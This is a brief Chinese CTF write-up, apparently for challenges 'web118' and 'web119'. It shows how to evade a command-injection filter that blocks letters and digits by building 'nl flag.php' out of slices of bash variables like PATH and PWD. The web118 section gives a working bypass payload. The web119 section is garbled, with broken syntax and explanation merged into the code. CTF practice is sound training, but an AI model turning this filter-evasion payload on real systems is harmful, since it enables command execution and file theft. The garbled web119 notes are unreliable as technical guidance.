# web118
已经知道 flag 在 flag.php 中,想办法打开文件就行
这里将小写字母和数字都过滤了,使用 bash 的内置变量进行绕过
题目应该在 html 下面,可以拿到 l,PATH 结尾是 /bin 拿到 n
可以使用 nl 命令
${PATH:~A}${PWD:~A}$IFS????.??? | |
//nl flag.php |
# web119
上面的 payload 用不了了,去 bin 下调用 cat 命令
${SHLVL} //一般是一个个位数
$:$:$:$` 相当于0,可省略,构造一个a==》${USER:~A}
${PWD::$为添加到shell的参数个数
rev命令将文件中的每行内容以字符为单位反序输出
$